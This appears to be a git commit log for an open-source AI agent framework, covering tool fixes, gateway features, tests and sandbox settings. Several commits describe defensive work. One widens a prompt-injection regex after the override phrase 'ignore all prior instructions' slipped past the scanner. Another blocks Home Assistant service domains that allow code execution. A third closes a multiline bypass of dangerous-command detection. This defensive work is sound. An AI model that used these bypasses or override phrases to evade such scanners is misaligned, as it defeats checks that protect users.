2026-03-02 01:18:52 -08:00
BathreeNode
c574a4d086 fix(batch_runner): log traceback when worker raises during imap_unordered
If any worker raises inside pool.imap_unordered(), the exception
propagates through the for loop and the results list is left
incomplete. The finally block correctly restores the log level but
the error is swallowed with no diagnostic information.

Added an explicit except block that logs the full traceback via
exc_info=True before re-raising, making batch worker failures
visible in logs without changing the existing control flow.
2026-03-02 12:16:07 +03:00
BathreeNode
bd8b20b933 Merge branch 'NousResearch:main' into main 2026-03-02 12:14:34 +03:00
teknium1
866fd9476b fix(docker): remove --read-only and allow exec on /tmp for package installs
The Docker sandbox previously used --read-only on the root filesystem and
noexec on /tmp. This broke 30+ skills that need to install packages:
- npm install -g (codex, claude-code, mcporter, powerpoint)
- pip install (20+ mlops/media/productivity skills)
- apt install (minecraft-modpack-server, ml-paper-writing)
- Build tools that compile in /tmp (pip wheels, node-gyp)

The container is already fully isolated from the host. Industry standard
(E2B, Docker Sandboxes, OpenAI Codex) does not use --read-only — the
container itself is the security boundary.

Retained security hardening:
- --cap-drop ALL (zero capabilities)
- --security-opt no-new-privileges (no escalation)
- --pids-limit 256 (no fork bombs)
- Size-limited tmpfs for /tmp, /var/tmp, /run
- nosuid on all tmpfs mounts
- noexec on /var/tmp and /run (rarely need exec there)
- Resource limits (CPU, memory, disk)
- Ephemeral containers (destroyed after use)

Fixes #189.
2026-03-02 01:09:34 -08:00
BathreeNode
d2ec5aaacf fix(registry): preserve full traceback on tool dispatch errors
logger.error() only records the exception message string, silently
discarding the stack trace. Switch to logger.exception() which
automatically appends the full traceback to the log output.

Without this change, when a tool handler raises an unexpected error
the log shows only the exception type and message, making it
impossible to determine which line caused the failure or trace
through nested calls.
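
That is, inside the dispatch path:

  import logging

  logger = logging.getLogger("tools")

  def dispatch(handler, **args):
      try:
          return handler(**args)
      except Exception:
          # logger.exception() == logger.error(..., exc_info=True): the
          # full traceback lands in the log, not just str(e).
          logger.exception("tool dispatch failed")
          raise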
2026-03-02 11:57:47 +03:00
teknium1
e265006fd6 test: add coverage for chat_topic in SessionSource and session context prompt
Tests added:
- Roundtrip serialization of chat_topic via to_dict/from_dict
- chat_topic defaults to None when missing from dict
- Channel Topic line appears in session context prompt when set
- Channel Topic line is omitted when chat_topic is None

Follow-up to PR #248 (feat: Discord channel topic in session context).
2026-03-02 00:53:21 -08:00
Josh Black-Star
b1bf11b0fe fix(setup): handle TerminalMenu init failures with safe fallback 2026-03-02 00:52:27 -08:00
teknium1
6bf3aad62e fix(delegate_tool): update max_iterations in documentation and example config to reflect default value of 50 2026-03-02 00:52:01 -08:00
teknium1
3a840a130c Merge PR #248: feat(gateway): include Discord channel topic in session context
Authored by Bartok9. Fixes #163.

Surfaces Discord channel topics in the agent's session context prompt,
allowing the agent to adapt its behavior based on the channel's purpose.
2026-03-02 00:51:20 -08:00
teknium1
14396e3fe7 fix(delegate_tool): update max_iterations default from 25 to 50 for improved task handling 2026-03-02 00:51:10 -08:00
teknium1
1ad930cbd0 fix(delegate_tool): increase DEFAULT_MAX_ITERATIONS from 25 to 50 to enhance processing capabilities 2026-03-02 00:51:01 -08:00
Sertug17
7a0b37712f fix(agent): strip finish_reason from assistant messages to fix Mistral 422 errors (#253)
* fix(agent): skip reasoning param for Mistral API to prevent 422 errors

* fix(agent): strip finish_reason from assistant messages to fix Mistral 422 errors
2026-03-02 00:35:03 -08:00
teknium1
e2b8740fcf fix: load_cli_config() now carries over non-default config keys
load_cli_config() only merged keys present in its hardcoded defaults
dict, silently dropping user-added keys like platform_toolsets (saved
by 'hermes tools'), provider_routing, memory, honcho, etc.

Added a second pass to carry over all file_config keys that aren't in
defaults, so 'hermes tools' changes actually take effect in CLI mode.

The gateway was unaffected (reads YAML directly via yaml.safe_load).
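
The merge now has two passes, roughly:

  def merge_config(defaults: dict, file_config: dict) -> dict:
      merged = dict(defaults)
      # Pass 1 (old behavior): keys the defaults know about.
      for key in defaults:
          if key in file_config:
              merged[key] = file_config[key]
      # Pass 2 (new): carry over user-added keys such as
      # platform_toolsets, provider_routing, memory, honcho, ...
      for key, value in file_config.items():
          if key not in defaults:
              merged[key] = value
      return merged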
2026-03-02 00:32:28 -08:00
teknium1
45d132d098 fix(agent): remove preview truncation in assistant message output
Updated the AIAgent class to print the full content of assistant messages without truncation, so agent output is no longer cut off at a preview length during runtime.
2026-03-02 00:32:06 -08:00
teknium1
719f2eef32 Merge branch 'pr-217'
# Conflicts:
#	gateway/session.py
2026-03-02 00:18:41 -08:00
teknium1
698b35933e fix: /retry, /undo, /compress, and /reset gateway commands (#210)
- /retry, /undo, /compress were setting a non-existent conversation_history
  attribute on SessionEntry (a @dataclass with no such field). The dangling
  attribute was silently created but never read — transcript was reloaded
  from DB on next interaction, making all three commands no-ops.

- /reset accessed self.session_store._sessions (non-existent) instead of
  self.session_store._entries, causing AttributeError caught by a bare
  except, silently skipping the pre-reset memory flush.

Fix:
- Add SessionDB.clear_messages() to delete messages and reset counters
- Add SessionStore.rewrite_transcript() to atomically replace transcript
  in both SQLite and legacy JSONL storage
- Replace all dangling attr assignments with rewrite_transcript() calls
- Fix _sessions → _entries in /reset handler

Closes #210
2026-03-02 00:14:49 -08:00
teknium1
0512ada793 feat(agent): include tools in agent status output
Added the tools attribute to the AIAgent class's status output, so the agent's currently loaded tools are visible in its status information at runtime.
2026-03-02 00:13:41 -08:00
teknium1
47289ba6f1 feat(agent): include system prompt in agent status output
Added the system prompt to the AIAgent class's status output, so the agent's active configuration is visible in its status information at runtime.
2026-03-01 23:50:54 -08:00
Robin Fernandes
5e5e0efc60 Fix nous refresh token rotation failure in case where api key mint/retrieval fails 2026-03-02 17:18:15 +11:00
teknium1
7b38afc179 fix(auth): handle session expiration and re-authentication in Nous Portal
Enhanced error handling in the _model_flow_nous function to detect session expiration and prompt for re-authentication with the Nous Portal. Added logic to manage re-login attempts and provide user feedback on success or failure, improving the overall user experience during authentication issues.
2026-03-01 20:20:30 -08:00
teknium1
e5893075f9 feat(agent): add summary handling for reasoning items
Enhanced the AIAgent class to capture and normalize summary information for reasoning items. Implemented logic to handle summaries as lists, ensuring proper formatting for API interactions. Updated tests to validate the inclusion of summaries in reasoning items, both for existing and default cases.
2026-03-01 20:03:03 -08:00
teknium1
5e598a588f refactor(auth): transition Codex OAuth tokens to Hermes auth store
Updated the authentication mechanism to store Codex OAuth tokens in the Hermes auth store located at ~/.hermes/auth.json instead of the previous ~/.codex/auth.json. This change includes refactoring related functions for reading and saving tokens, ensuring better management of authentication states and preventing conflicts between different applications. Adjusted tests to reflect the new storage structure and improved error handling for missing or malformed tokens.
2026-03-01 19:59:24 -08:00
Aayush Chaudhary
c2d8d17285 feat(skills): add DuckDuckGo search skill as Firecrawl fallback 2026-03-02 09:08:59 +05:30
teknium1
8bc2de4ab6 feat(provider-routing): add OpenRouter provider routing configuration
Introduced a new `provider_routing` section in the CLI configuration to control how requests are routed across providers when using OpenRouter. This includes options for sorting providers by throughput, latency, or price, as well as allowing or ignoring specific providers, setting the order of provider attempts, and managing data collection policies. Updated relevant classes and documentation to support these features, enhancing flexibility in provider selection.
2026-03-01 18:24:27 -08:00
teknium1
75a92a3f82 refactor(cli): improve header formatting and description truncation
Updated the CLI header formatting for tool and configuration displays to center titles within their respective widths. Enhanced the display of command descriptions to include an ellipsis for longer texts, ensuring better readability. This refactor improves the overall user interface of the CLI.
2026-03-01 16:37:16 -08:00
teknium1
72963e9ccb fix(install): prevent interactive prompts during non-interactive installs
Updated the install.sh script to set DEBIAN_FRONTEND and NEEDRESTART_MODE environment variables for non-interactive package installations on Ubuntu and Debian. This change ensures that prompts from needrestart and whiptail do not block the installation process, improving automation for system package installations.
2026-03-01 16:18:35 -08:00
teknium1
92da8e7e62 feat(agent): enhance reasoning handling and configuration
Added support for processing encrypted reasoning content within the AIAgent class. Introduced logic to determine reasoning effort and enable/disable reasoning based on configuration settings. Updated the kwargs to reflect these changes, ensuring proper handling of reasoning parameters during agent execution.
2026-03-01 16:15:20 -08:00
teknium1
c84d5ce738 refactor(terminal_tool): clarify foreground and background process usage
Updated documentation within terminal_tool.py to emphasize the appropriate use of foreground and background processes. Enhanced descriptions for the timeout setting and background execution to guide users towards optimal configurations for scripts, builds, and long-running tasks. Adjusted the default timeout value from 60 to 180 seconds for improved handling of longer operations.
2026-03-01 16:15:05 -08:00
teknium1
dda9f3e734 fix(process_registry): ensure unbuffered output for subprocesses
Updated the environment variables for subprocess execution in the ProcessRegistry class to set PYTHONUNBUFFERED to "1". This change ensures that output from Python scripts is unbuffered, allowing for real-time visibility of progress during background execution. Adjusted both the pty and background process spawning methods to use the new environment configuration.
2026-03-01 16:14:57 -08:00
teknium1
834e25a662 feat(batch_runner): enhance prompt processing with optional container image support
Updated the _process_single_prompt function to accept an optional 'image' field in prompt_data, allowing for per-prompt container image overrides. Implemented checks for Docker image accessibility and added logic to register task environment overrides for Docker, Modal, and Singularity. This improves flexibility in managing containerized environments for prompt execution.
2026-03-01 16:14:36 -08:00
aydnOktay
196a13f3dc Improve error handling and validation in transcription_tools 2026-03-02 01:53:18 +03:00
aydnOktay
440d33eec4 Improve error handling and type hints in session_search_tool 2026-03-02 01:50:37 +03:00
teknium1
11f5c1ecf0 fix(tests): use bare @pytest.mark.asyncio for hook emit tests
Remove loop_scope="function" parameter from async test decorators in
test_hooks.py. This matches the existing convention in the repo
(test_telegram_documents.py) and avoids requiring pytest-asyncio 0.23+.

All 144 new tests from PR #191 now pass.
2026-03-01 05:28:55 -08:00
0xbyt4
3b745633e4 test: add unit tests for 8 untested modules (batch 3) (#191)
* test: add unit tests for 8 untested modules (batch 3)

New test files (143 tests total):
- tools/debug_helpers.py: DebugSession enable/disable, log, save, session info
- tools/skills_guard.py: scan_file, scan_skill, trust levels, install policy, structural checks
- tools/skills_sync.py: manifest read/write, skill discovery, sync logic
- gateway/sticker_cache.py: cache CRUD, sticker injection text builders
- gateway/channel_directory.py: channel resolution, display formatting, session building
- gateway/hooks.py: hook discovery, sync/async emit, wildcard matching
- gateway/mirror.py: session lookup, JSONL append, mirror_to_session
- honcho_integration/client.py: config from env/file, session name resolution, linked workspaces

Also documents a gap in skills_guard: multi-word prompt injection
variants like "ignore all prior instructions" bypass the regex scanner.

* test: strengthen sticker injection tests with exact format assertions

Replace loose "contains" checks with exact output matching for
build_sticker_injection and build_animated_sticker_injection.
Add edge cases: set_name without emoji, empty description, empty emoji.

* test: remove skills_guard gap-documenting test to avoid conflict with fix PR
2026-03-01 05:28:12 -08:00
0xbyt4
900d48714a Merge remote-tracking branch 'origin/main' into test/expand-coverage-4
# Conflicts:
#	tests/agent/test_auxiliary_client.py
2026-03-01 12:11:54 +03:00
0xbyt4
3fdf03390e Merge remote-tracking branch 'origin/main' into feature/homeassistant-integration
# Conflicts:
#	run_agent.py
2026-03-01 11:59:12 +03:00
0xbyt4
25fb9aafcb fix: add service domain blocklist and entity_id validation to HA tools
Block dangerous HA service domains (shell_command, command_line,
python_script, pyscript, hassio, rest_command) that allow arbitrary
code execution or SSRF. Add regex validation for entity_id to prevent
path traversal attacks. 17 new tests covering both security features.
2026-03-01 11:53:50 +03:00
Bartok Moltbot
54147474d3 feat(gateway): include Discord channel topic in session context
Fixes #163

- Add chat_topic field to SessionSource dataclass
- Update to_dict/from_dict for serialization support
- Add chat_topic parameter to build_source helper
- Extract channel.topic in Discord adapter for messages and slash commands
- Display Channel Topic in system prompt when available
- Normalize empty topics to None
2026-03-01 03:48:24 -05:00
teknium1
4d6f380bd1 docs: update README and CLI documentation for new commands
Enhanced the README and CLI documentation to cover the newly added `/compress` and `/usage` commands for managing conversation context and monitoring token usage. Updated log descriptions to clarify the contents of each log file, noting that sensitive information is automatically redacted.
2026-03-01 00:28:07 -08:00
teknium1
93f5fd80b8 feat(gateway): add /compress and /usage commands for conversation management
Implemented the /compress command to allow users to manually compress conversation context, ensuring sufficient history is available before execution. The /usage command was also added to display token usage statistics for the current session, including prompt and completion tokens. Updated command documentation to reflect these new features.
2026-03-01 00:25:44 -08:00
teknium1
177be32b7f feat(cli): add /usage command to display session token usage
Introduced a new command "/usage" in the CLI to show cumulative token usage for the current session. This includes details on prompt tokens, completion tokens, total tokens, API calls, and context state. Updated command documentation to reflect this addition. Enhanced the AIAgent class to track token usage throughout the session.
2026-03-01 00:23:19 -08:00
teknium1
30efc263ff feat(cli): add /compress command for manual conversation context compression
Introduced a new command "/compress" to the CLI, allowing users to manually trigger context compression on the current conversation. The method checks for sufficient conversation history and active agent status before performing compression, providing feedback on the number of messages and tokens before and after the operation. Updated command documentation accordingly.
2026-03-01 00:16:38 -08:00
Bartok Moltbot
ed0e860abb fix(honcho): auto-enable when API key is present
Fixes #241

When users set HONCHO_API_KEY via `hermes config set` or environment
variable, they expect the integration to activate. Previously, the
`enabled` flag defaulted to `false` when reading from global config,
requiring users to also explicitly enable Honcho.

This change auto-enables Honcho when:
- An API key is present (from config file or env var)
- AND `enabled` is not explicitly set to `false` in the config

Users who want to disable Honcho while keeping the API key can still
set `enabled: false` in their config.

Also adds unit tests for the auto-enable behavior.
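
The decision, in sketch form:

  def honcho_enabled(config: dict, api_key) -> bool:
      # Explicit opt-out always wins; otherwise a present API key
      # auto-enables the integration.
      if config.get("enabled") is False:
          return False
      return bool(api_key or config.get("enabled"))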
2026-03-01 03:12:37 -05:00
teknium1
41d8a80226 fix(display): fix subagent progress tree-view visual nits
Two fixes to the subagent progress display from PR #186:

1. Task index prefix: show 1-indexed prefix ([1], [2], ...) for ALL
   tasks in batch mode (task_count > 1). Single tasks get no prefix.
   Previously task 0 had no prefix while others did, making batch
   output confusing.

2. Completion indicator: use spinner.print_above() instead of raw
   print() for per-task completion lines (✓ [1/2] ...). Raw print
   collided with the active spinner, mushing the completion text
   onto the spinner line. Now prints cleanly above.

Added task_count parameter to _build_child_progress_callback and
_run_single_child. Updated tests accordingly.
2026-02-28 23:29:49 -08:00
teknium1
4ec386cc72 fix(display): use spaces instead of ANSI \033[K in print_above() for prompt_toolkit compat
print_above() used \033[K (erase-to-end-of-line) to clear the spinner
line before printing text above it. This causes garbled escape codes when
prompt_toolkit's patch_stdout is active in CLI mode.

Switched to the same spaces-based clearing approach used by stop() —
overwrite with blanks, then carriage return back to start of line.

Updated test assertion to match the new clearing method.
2026-02-28 23:19:23 -08:00
lila
dd69f16c3e feat(gateway): expose subagent tool calls and thinking to user (fixes #169) (#186)
When subagents run via delegate_task, the user now sees real-time
progress instead of silence:

CLI: tree-view activity lines print above the delegation spinner
  🔀 Delegating: research quantum computing
     ├─ 💭 "I'll search for papers first..."
     ├─ 🔍 web_search  "quantum computing"
     ├─ 📖 read_file  "paper.pdf"
     └─ ⠹ working... (18.2s)

Gateway (Telegram/Discord): batched progress summaries sent every
5 tool calls to avoid message spam. Remaining tools flushed on
subagent completion.

Changes:
- agent/display.py: add KawaiiSpinner.print_above() to print
  status lines above an active spinner without disrupting animation.
  Uses captured stdout (self._out) so it works inside the child's
  redirect_stdout(devnull).

- tools/delegate_tool.py: add _build_child_progress_callback()
  that creates a per-child callback relaying tool calls and
  thinking events to the parent's spinner (CLI) or progress
  queue (gateway). Each child gets its own callback instance,
  so parallel subagents don't share state. Includes _flush()
  for gateway batch completion.

- run_agent.py: fire tool_progress_callback with '_thinking'
  event when the model produces text content. Guarded by
  _delegate_depth > 0 so only subagents fire this (prevents
  gateway spam from main agent). REASONING_SCRATCHPAD/think/
  reasoning XML tags are stripped before display.

Tests: 21 new tests covering print_above, callback builder,
thinking relay, SCRATCHPAD filtering, batching, flush, thread
isolation, delegate_depth guard, and prefix handling.
2026-02-28 23:18:00 -08:00
teknium1
1db5598294 feat(tests): add live integration tests for file operations and shell noise filtering
- Introduce a new test suite in `test_file_tools_live.py` to validate file operations and ensure accurate command execution in a real environment.
- Implement assertions to check for shell noise contamination in outputs, enhancing the reliability of command results.
- Create fixtures for setting up a local environment and populating directories with known file contents for comprehensive testing.
- Refactor shell noise handling in `process_registry.py` and `local.py` to support multiple noise patterns, improving output cleanliness.
2026-02-28 22:57:58 -08:00
teknium1
23d0b7af6a feat(logging): implement persistent error logging for tool failures
- Introduce a separate error log for capturing warnings and errors related to tool execution, ensuring detailed inspection of issues post-failure.
- Enhance error handling in the AIAgent class to log exceptions with stack traces for better debugging.
- Add a similar error logging mechanism in the gateway to streamline debugging processes.
2026-02-28 22:49:58 -08:00
teknium1
a7c2b9e280 fix(display): enhance memory error detection for tool failures
- Implement logic to distinguish between "full" memory errors and actual failures in the `_detect_tool_failure` function.
- Add JSON parsing to identify specific error messages related to memory limits, improving error handling for memory-related tools.
2026-02-28 22:49:52 -08:00
teknium1
70dfec9638 test(redact): add sensitive text redaction
- Introduce a new test suite for the `redact_sensitive_text` function, covering various sensitive data formats including API keys, tokens, and environment variables.
- Ensure that sensitive information is properly masked in logs and outputs while non-sensitive data remains unchanged.
- Add tests for different scenarios including JSON fields, authorization headers, and environment variable assignments.
- Implement a redacting formatter for logging to enhance security during log output.
2026-02-28 21:56:27 -08:00
teknium1
95b0610f36 refactor(cli, auth): Add Codex/OpenAI OAuth Support - finalized
- Replace `hermes login` with `hermes model` for selecting providers and managing authentication.
- Update documentation and CLI commands to reflect the new provider selection process.
- Introduce a new redaction system for logging sensitive information.
- Enhance Codex model discovery by integrating API fetching and local cache.
- Adjust max turns configuration logic for better clarity and precedence.
- Improve error handling and user feedback during authentication processes.
2026-02-28 21:56:27 -08:00
teknium1
500f0eab4a refactor(cli): Finalize OpenAI Codex Integration with OAuth
- Enhanced Codex model discovery by fetching available models from the API, with fallback to local cache and defaults.
- Updated the context compressor's summary target tokens to 2500 for improved performance.
- Added external credential detection for Codex CLI to streamline authentication.
- Refactored various components to ensure consistent handling of authentication and model selection across the application.
2026-02-28 21:47:51 -08:00
Teknium
86b1db0598 Merge pull request #43 from grp06/codex/align-codex-provider-conventions-mainrepo
Enable ChatGPT subscription Codex support end-to-end
2026-02-28 18:13:58 -08:00
Teknium
5a79e423fe Merge branch 'main' into codex/align-codex-provider-conventions-mainrepo 2026-02-28 18:13:38 -08:00
teknium1
7f7643cf63 feat(hooks): introduce event hooks system for lifecycle management
Add a new hooks system allowing users to run custom code at key lifecycle points in the agent's operation. This includes support for events such as `gateway:startup`, `session:start`, `agent:step`, and more. Documentation for creating hooks and available events has been added to `README.md` and a new `hooks.md` file. Additionally, integrate step callbacks in the agent to facilitate hook execution during tool-calling iterations.
2026-02-28 17:09:26 -08:00
teknium1
bf52468a91 fix(gateway): improve MEDIA tag handling to prevent duplication across turns
Refactor the extraction of MEDIA paths to collect them from the history before processing the current turn's messages. This change ensures that MEDIA tags are deduplicated based on previously seen paths, preventing TTS voice messages from being re-attached in subsequent replies. This addresses the issue outlined in #160.
2026-02-28 16:49:49 -08:00
Teknium
b4688f10d4 Merge pull request #176 from Bartok9/fix-tts-voice-accumulation
fix(gateway): prevent TTS voice messages from accumulating across turns
2026-02-28 16:45:52 -08:00
Teknium
31a5cd185a Merge pull request #174 from Bartok9/fix-think-block-leakage
fix: strip <think> blocks from final response to users
2026-02-28 16:43:47 -08:00
Farukest
7166647ca1 fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection 2026-03-01 03:23:29 +03:00
Farukest
f7300a858e fix(tools): use task-specific glob pattern in disk usage calculation 2026-03-01 03:17:50 +03:00
Farukest
e87859e82c fix(agent): copy conversation_history to avoid mutating caller's list 2026-03-01 03:06:13 +03:00
Farukest
de101a8202 fix(agent): strip _flush_sentinel from API messages 2026-03-01 02:51:31 +03:00
Farukest
7f1f4c2248 fix(tools): preserve empty content in ReadResult.to_dict() 2026-03-01 02:42:15 +03:00
Farukest
c33f8d381b fix: correct off-by-one in retry exhaustion checks
The retry exhaustion checks used > instead of >= to compare
retry_count against max_retries. Since the while loop condition is
retry_count < max_retries, the check retry_count > max_retries can
never be true inside the loop. When retries are exhausted, the loop
exits and falls through to response.choices[0] on an invalid response,
crashing with IndexError instead of returning a proper error.
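
In sketch form:

  def retries_exhausted(retry_count: int, max_retries: int) -> bool:
      # The surrounding loop runs while retry_count < max_retries, so a
      # strict '>' can never fire inside it; '>=' triggers on the final
      # attempt and lets the caller return a proper error instead of
      # indexing response.choices[0] on an invalid response.
      return retry_count >= max_retries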
2026-03-01 02:27:26 +03:00
Farukest
3f58e47c63 fix: guard POSIX-only process functions for Windows compatibility
os.setsid, os.killpg, and os.getpgid do not exist on Windows and raise
AttributeError on import or first call. This breaks the terminal tool,
code execution sandbox, process registry, and WhatsApp bridge on Windows.

Added _IS_WINDOWS platform guard in all four affected files, following
the pattern documented in CONTRIBUTING.md. On Windows, preexec_fn is
set to None and process termination falls back to proc.terminate() /
proc.kill() instead of process group signals.

Files changed:
- tools/environments/local.py (3 call sites)
- tools/process_registry.py (2 call sites)
- tools/code_execution_tool.py (3 call sites)
- gateway/platforms/whatsapp.py (3 call sites)
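
The guard pattern, in sketch form:

  import os
  import signal
  import subprocess
  import sys

  _IS_WINDOWS = sys.platform == "win32"

  def spawn(cmd: list) -> subprocess.Popen:
      # os.setsid does not exist on Windows; the short-circuit avoids
      # the AttributeError at call time.
      return subprocess.Popen(cmd, preexec_fn=None if _IS_WINDOWS else os.setsid)

  def kill(proc: subprocess.Popen) -> None:
      if _IS_WINDOWS:
          proc.terminate()  # no process groups / SIGKILL on Windows
      else:
          os.killpg(os.getpgid(proc.pid), signal.SIGTERM)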
2026-03-01 01:54:27 +03:00
Farukest
b7f8a17c24 fix(gateway): persist transcript changes in /retry, /undo and fix /reset
/retry and /undo set session_entry.conversation_history which does not
exist on SessionEntry. The truncated history was never written to disk,
so the next message reload picked up the full unmodified transcript.

Added SessionStore.rewrite_transcript() that persists changes to both
the JSONL file and SQLite database, and updated both commands to use it.

/reset accessed self.session_store._sessions which does not exist on
SessionStore (the correct attribute is _entries). Also replaced the
hand-coded session key with _generate_session_key() to fix WhatsApp DM
sessions using the wrong key format.

Closes #210
2026-03-01 01:40:30 +03:00
VolodymyrBg
6cbb8f3a0c fix: align _apply_delete comment with actual behavior 2026-02-28 22:58:01 +02:00
gizdusum
ec97f9ad1a feat(skills): add Solana blockchain skill (converted from tool) 2026-02-28 23:39:39 +03:00
0xbyt4
10085041cf feat: add ascii-art skill for creative text banners and art
Unicode-based ASCII art generator skill with multiple styles
(block, shadow, outlined, gradient, decorative frame), character
palette reference, and usage examples. No external dependencies.
2026-02-28 22:33:10 +03:00
teknium1
7b23dbfe68 feat(animation): add support for sending animated GIFs in BasePlatformAdapter and TelegramAdapter 2026-02-28 11:25:44 -08:00
teknium1
8e0c48e6d2 feat(skills): implement dynamic skill slash commands for CLI and gateway 2026-02-28 11:18:50 -08:00
0xbyt4
b759602483 fix: prevent italic regex from spanning newlines in Telegram formatter
The italic regex \*([^*]+)\* used [^*] which matches newlines, causing
bullet lists with * markers to be incorrectly converted to italic text.
Changed to [^*\n]+ to prevent cross-line matching.

Adds 43 tests for _escape_mdv2 and format_message covering code blocks,
bold/italic, headers, links, mixed formatting, and the regression case.
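
The one-character regression, for reference:

  import re

  # Before: [^*] also matches '\n', so '*' bullets on consecutive
  # lines paired up into one italic span.
  ITALIC_BROKEN = re.compile(r"\*([^*]+)\*")
  # After: stop at line boundaries.
  ITALIC_FIXED = re.compile(r"\*([^*\n]+)\*")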
2026-02-28 22:01:48 +03:00
teknium1
2205b22409 fix(headers): update X-OpenRouter-Categories to include 'productivity' 2026-02-28 10:38:49 -08:00
teknium1
1ddf8c26f5 refactor(cli): update max turns configuration precedence and enhance documentation 2026-02-28 10:35:49 -08:00
0xbyt4
9769e07cd5 test: add 25 unit tests for trajectory_compressor
Tests cover CompressionConfig (defaults, from_yaml with full/partial/empty),
TrajectoryMetrics and AggregateMetrics (to_dict, aggregation, division-by-zero
guards), _find_protected_indices (basic, all-protected, no tail, missing roles,
disabled protection), _extract_turn_content_for_summary (basic, truncation,
empty range), and token counting (empty, basic, trajectory, fallback on error).
2026-02-28 21:28:28 +03:00
0xbyt4
08250a53a1 fix: skills hub dedup prefers higher trust levels + 43 tests
- unified_search and GitHubSource.search dedup: replace naive
  `trust_level == "trusted"` check with ranked comparison so
  "builtin" results are never overwritten by "trusted" or "community"
- Add 43 unit tests covering _parse_frontmatter_quick, trust_level_for,
  HubLockFile CRUD, TapsManager ops, LobeHub _convert_to_skill_md,
  unified_search dedup (with regression test), and append_audit_log
2026-02-28 21:25:55 +03:00
0xbyt4
ff6d62802d fix: platform base extract_images and truncate_message bugs + tests
- extract_images: only remove extracted image tags from content, preserve
  non-image markdown links (e.g. PDFs) that were previously silently lost
- truncate_message: walk only chunk_body (not prepended prefix) so the
  reopened code fence does not toggle in_code off, leaving continuation
  chunks with unclosed code blocks
- Add 49 unit tests covering MessageEvent command parsing, extract_images,
  extract_media, truncate_message code block handling, and _get_human_delay
2026-02-28 21:21:03 +03:00
0xbyt4
46506769f1 test: add unit tests for 5 security/logic-critical modules (batch 4)
- gateway/pairing.py: rate limiting, lockout, code expiry, approval flow (28 tests)
- tools/skill_manager_tool.py: validation, path traversal prevention, CRUD (46 tests)
- tools/skills_tool.py: frontmatter/tag parsing, skill discovery, view chain (34 tests)
- agent/auxiliary_client.py: auth reading, API key resolution, param branching (16 tests)
- honcho_integration/session.py: session dataclass, ID sanitization, transcript format (20 tests)
2026-02-28 20:33:48 +03:00
0xbyt4
4ea29978fc fix(security): catch multi-word prompt injection in skills_guard
The regex `ignore\s+(previous|all|...)\s+instructions` only matched
a single keyword between 'ignore' and 'instructions'. Phrases like
'ignore all prior instructions' bypassed the scanner entirely.

Changed to `ignore\s+(?:\w+\s+)*(previous|all|...)\s+instructions`
to allow arbitrary words before the keyword.
2026-02-28 20:16:48 +03:00
0xbyt4
dfd50ceccd fix: preserve Gemini thought_signature in tool call messages
Gemini 3 thinking models attach extra_content with thought_signature
to function call responses. This must be echoed back on subsequent
API calls or the server rejects with a 400 error. The assistant
message builder was dropping this field, causing all Gemini 3 Flash/Pro
tool-calling flows to fail after the first function call.
2026-02-28 18:10:05 +03:00
teknium1
6366177118 refactor: update context compression configuration to use config.yaml and improve model handling 2026-02-28 04:46:38 -08:00
0xbyt4
2390728cc3 fix: resolve 4 bugs found in HA integration code review
- Auto-authorize HA events in gateway (system-generated, not user messages)
- Guard _read_events against None/closed WebSocket after failed reconnect
- Use UUID for send() message_id instead of polluting WS sequence counter
- entity_id parameter now takes precedence over data["entity_id"]
2026-02-28 15:12:18 +03:00
0xbyt4
b32c642af3 test: add HA integration tests with fake in-process server
Fake HA server (aiohttp.web) simulates full API surface over real TCP:
- WebSocket auth handshake + event push
- REST endpoints (states, services, notifications)

14 integration tests verify end-to-end flows without mocks:
- WS connect/auth/subscribe/event-forwarding/disconnect
- REST list/get/call-service against fake server
- send() notification delivery and auth failure
- 401/500 error handling
2026-02-28 14:28:04 +03:00
0xbyt4
c36b256de5 feat: add Home Assistant integration (REST tools + WebSocket gateway)
- Add ha_list_entities, ha_get_state, ha_call_service tools via REST API
- Add WebSocket gateway adapter for real-time state_changed event monitoring
- Support domain/entity filtering, cooldown, and auto-reconnect with backoff
- Use REST API for outbound notifications to avoid WS race condition
- Gate tool availability on HASS_TOKEN env var
- Add 82 unit tests covering real logic (filtering, payload building, event pipeline)
2026-02-28 13:32:48 +03:00
Teknium
0afe1b707d Merge pull request #178 from gamedevCloudy/main
fix(install): ignore commented lines when checking for PATH
2026-02-28 02:14:31 -08:00
Aayush Chaudhary
f213620c8b fix(install): ignore commented lines when checking for existing PATH configuration 2026-02-28 14:28:18 +05:30
Bartok9
35655298e6 fix(gateway): prevent TTS voice messages from accumulating across turns
Fixes #160

The issue was that MEDIA tags were being extracted from ALL messages
in the conversation history, not just messages from the current turn.
This caused TTS voice messages generated in earlier turns to be
re-attached to every subsequent reply.

The fix:
- Track history_len before calling run_conversation
- Only scan messages AFTER history_len for MEDIA tags
- Add comprehensive tests to prevent regression

This ensures each voice message is sent exactly once, when it's
generated, not on every subsequent message in the session.
2026-02-28 03:38:27 -05:00
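A minimal sketch of the history_len fix; the MEDIA tag syntax here is hypothetical:

```python
import re

MEDIA_RE = re.compile(r"\[MEDIA:([^\]]+)\]")  # hypothetical tag syntax

def collect_new_media(messages: list[dict], history_len: int) -> list[str]:
    """Scan only messages appended during the current turn.

    history_len is captured before run_conversation; slicing from it
    means voice messages from earlier turns are never re-extracted.
    """
    paths: list[str] = []
    for msg in messages[history_len:]:
        paths.extend(MEDIA_RE.findall(msg.get("content") or ""))
    return paths
```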
Bartok9
1e463a8e39 fix: strip <think> blocks from final response to users
Fixes #149

The _strip_think_blocks() method existed but was not applied to the
final_response in the normal completion path. This caused <think>...</think>
XML tags to leak into user-facing responses on all platforms (CLI, Telegram,
Discord, Slack, WhatsApp).

Changes:
- Strip think blocks from final_response before returning in normal path (line ~2600)
- Strip think blocks from fallback content when salvaging from prior tool_calls turn

Notes:
- The raw content with think blocks is preserved in messages[] for trajectory
  export - this only affects the user-facing final_response
- The _has_content_after_think_block() check still uses raw content before
  stripping, which is correct for detecting think-only responses
2026-02-28 03:06:20 -05:00
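A minimal sketch of the stripping behavior, assuming the tags appear literally in the final text:

```python
import re

THINK_RE = re.compile(r"<think>.*?</think>\s*", re.DOTALL)

def strip_think_blocks(text: str) -> str:
    """Drop <think>...</think> spans before text reaches the user."""
    return THINK_RE.sub("", text).strip()

raw = "<think>plan the answer first</think>The capital of France is Paris."
assert strip_think_blocks(raw) == "The capital of France is Paris."
```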
teknium1
de5a88bd97 refactor: migrate tool progress configuration from environment variables to config.yaml 2026-02-28 00:05:58 -08:00
teknium1
0862fa96fd refactor(domain-intel): streamline documentation and add CLI tool for domain intelligence operations 2026-02-27 23:53:24 -08:00
Teknium
924570c5be Merge pull request #136 from FurkanL0/feat/domain-intel-skill
